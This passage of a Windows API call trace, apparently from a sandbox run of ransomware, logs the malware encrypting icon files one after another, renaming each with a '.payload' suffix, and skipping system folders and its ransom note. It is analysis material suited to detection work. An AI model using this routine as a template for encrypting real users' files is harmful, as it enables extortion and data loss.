lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.690] CloseHandle (hObject=0x438) returned 1 [0060.691] GetProcessHeap () returned 0x5e0000 [0060.691] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.691] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico_r00t_{nhhHyu}.payload") returned 65 [0060.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.692] GetProcessHeap () returned 0x5e0000 [0060.692] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.692] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0060.692] lstrcmpiW (lpString1="Setup.ico", lpString2="Windows") returned -1 [0060.692] lstrcmpiW (lpString1="Setup.ico", lpString2="$Recycle.bin") returned 1 [0060.692] lstrcmpiW (lpString1="Setup.ico", lpString2="System Volume Information") returned -1 [0060.692] lstrcmpiW (lpString1="Setup.ico", lpString2="Program Files") returned 1 [0060.692] lstrcmpiW (lpString1="Setup.ico", lpString2="Program Files (x86)") returned 1 [0060.692] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 44 [0060.692] StrStrIW (lpFirst="Setup.ico", lpSrch=".payload") returned 0x0 [0060.692] lstrcmpW (lpString1="Setup.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.692] lstrcmpW (lpString1="Setup.ico", lpString2="taridd") returned -1 [0060.692] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.692] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.692] GetTickCount () returned 0x114f994 [0060.692] GetTickCount () returned 0x114f994 [0060.692] GetTickCount () returned 0x114f994 [0060.692] GetTickCount () returned 0x114f994 [0060.692] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.692] GetProcessHeap () returned 0x5e0000 [0060.693] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.693] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.695] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.695] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.695] GetProcessHeap () returned 0x5e0000 [0060.695] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.695] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.695] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.695] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.695] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.695] CloseHandle (hObject=0x438) returned 1 [0060.697] GetProcessHeap () returned 0x5e0000 [0060.697] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.697] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico_r00t_{nhhHyu}.payload") returned 66 [0060.697] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.698] GetProcessHeap () returned 0x5e0000 [0060.698] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.698] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stop.ico", cAlternateFileName="")) returned 1 [0060.698] lstrcmpiW (lpString1="stop.ico", lpString2="Windows") returned -1 [0060.698] lstrcmpiW (lpString1="stop.ico", lpString2="$Recycle.bin") returned 1 [0060.698] lstrcmpiW (lpString1="stop.ico", lpString2="System Volume Information") returned -1 [0060.698] lstrcmpiW (lpString1="stop.ico", lpString2="Program Files") returned 1 [0060.698] lstrcmpiW (lpString1="stop.ico", lpString2="Program Files (x86)") returned 1 [0060.698] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 43 [0060.698] StrStrIW (lpFirst="stop.ico", lpSrch=".payload") returned 0x0 [0060.698] lstrcmpW (lpString1="stop.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.698] lstrcmpW (lpString1="stop.ico", lpString2="taridd") returned -1 [0060.698] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.698] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.698] GetTickCount () returned 0x114f9a3 [0060.698] GetTickCount () returned 0x114f9a3 [0060.699] GetTickCount () returned 0x114f9a3 [0060.699] GetTickCount () returned 0x114f9a3 [0060.699] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.699] GetProcessHeap () returned 0x5e0000 [0060.699] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.699] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x2796, lpOverlapped=0x0) returned 1 [0060.700] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd86a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.700] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2796, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x2796, lpOverlapped=0x0) returned 1 [0060.700] GetProcessHeap () returned 0x5e0000 [0060.700] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.700] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.700] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.701] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.701] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.701] CloseHandle (hObject=0x438) returned 1 [0060.701] GetProcessHeap () returned 0x5e0000 [0060.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.701] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico_r00t_{nhhHyu}.payload") returned 65 [0060.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\stop.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.702] GetProcessHeap () returned 0x5e0000 [0060.702] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.702] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SysReqMet.ico", cAlternateFileName="SYSREQ~1.ICO")) returned 1 [0060.702] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="Windows") returned -1 [0060.702] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="$Recycle.bin") returned 1 [0060.702] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="System Volume Information") returned -1 [0060.703] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="Program Files") returned 1 [0060.703] lstrcmpiW (lpString1="SysReqMet.ico", lpString2="Program Files (x86)") returned 1 [0060.703] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 48 [0060.703] StrStrIW (lpFirst="SysReqMet.ico", lpSrch=".payload") returned 0x0 [0060.704] lstrcmpW (lpString1="SysReqMet.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.704] lstrcmpW (lpString1="SysReqMet.ico", lpString2="taridd") returned -1 [0060.704] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.704] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.704] GetTickCount () returned 0x114f9a3 [0060.704] GetTickCount () returned 0x114f9a3 [0060.704] GetTickCount () returned 0x114f9a3 [0060.704] GetTickCount () returned 0x114f9a3 [0060.704] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.704] GetProcessHeap () returned 0x5e0000 [0060.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.704] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0060.706] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffb82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.706] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x47e, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0060.706] GetProcessHeap () returned 0x5e0000 [0060.706] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.706] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.706] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.706] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.706] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.706] CloseHandle (hObject=0x438) returned 1 [0060.707] GetProcessHeap () returned 0x5e0000 [0060.707] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.707] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico_r00t_{nhhHyu}.payload") returned 70 [0060.707] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.708] GetProcessHeap () returned 0x5e0000 [0060.708] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.708] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SysReqNotMet.ico", cAlternateFileName="SYSREQ~2.ICO")) returned 1 [0060.708] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="Windows") returned -1 [0060.708] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="$Recycle.bin") returned 1 [0060.708] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="System Volume Information") returned -1 [0060.708] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="Program Files") returned 1 [0060.708] lstrcmpiW (lpString1="SysReqNotMet.ico", lpString2="Program Files (x86)") returned 1 [0060.708] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 51 [0060.708] StrStrIW (lpFirst="SysReqNotMet.ico", lpSrch=".payload") returned 0x0 [0060.708] lstrcmpW (lpString1="SysReqNotMet.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.708] lstrcmpW (lpString1="SysReqNotMet.ico", lpString2="taridd") returned -1 [0060.708] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.708] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.708] GetTickCount () returned 0x114f9a3 [0060.708] GetTickCount () returned 0x114f9a3 [0060.708] GetTickCount () returned 0x114f9a3 [0060.708] GetTickCount () returned 0x114f9a3 [0060.708] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.708] GetProcessHeap () returned 0x5e0000 [0060.708] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.708] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0060.710] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffb82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.710] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x47e, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0060.710] GetProcessHeap () returned 0x5e0000 [0060.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.710] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.710] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.710] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.710] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.710] CloseHandle (hObject=0x438) returned 1 [0060.711] GetProcessHeap () returned 0x5e0000 [0060.711] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.711] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico_r00t_{nhhHyu}.payload") returned 73 [0060.711] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.712] GetProcessHeap () returned 0x5e0000 [0060.712] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.712] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="warn.ico", cAlternateFileName="")) returned 1 [0060.712] lstrcmpiW (lpString1="warn.ico", lpString2="Windows") returned -1 [0060.712] lstrcmpiW (lpString1="warn.ico", lpString2="$Recycle.bin") returned 1 [0060.712] lstrcmpiW (lpString1="warn.ico", lpString2="System Volume Information") returned 1 [0060.712] lstrcmpiW (lpString1="warn.ico", lpString2="Program Files") returned 1 [0060.712] lstrcmpiW (lpString1="warn.ico", lpString2="Program Files (x86)") returned 1 [0060.712] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 43 [0060.712] StrStrIW (lpFirst="warn.ico", lpSrch=".payload") returned 0x0 [0060.712] lstrcmpW (lpString1="warn.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.712] lstrcmpW (lpString1="warn.ico", lpString2="taridd") returned 1 [0060.712] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.712] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.712] GetTickCount () returned 0x114f9a3 [0060.712] GetTickCount () returned 0x114f9a3 [0060.712] GetTickCount () returned 0x114f9a3 [0060.712] GetTickCount () returned 0x114f9a3 [0060.712] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.712] GetProcessHeap () returned 0x5e0000 [0060.712] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.712] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x2796, lpOverlapped=0x0) returned 1 [0060.714] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd86a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.714] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2796, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x2796, lpOverlapped=0x0) returned 1 [0060.714] GetProcessHeap () returned 0x5e0000 [0060.714] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.714] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.714] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.714] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.714] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: 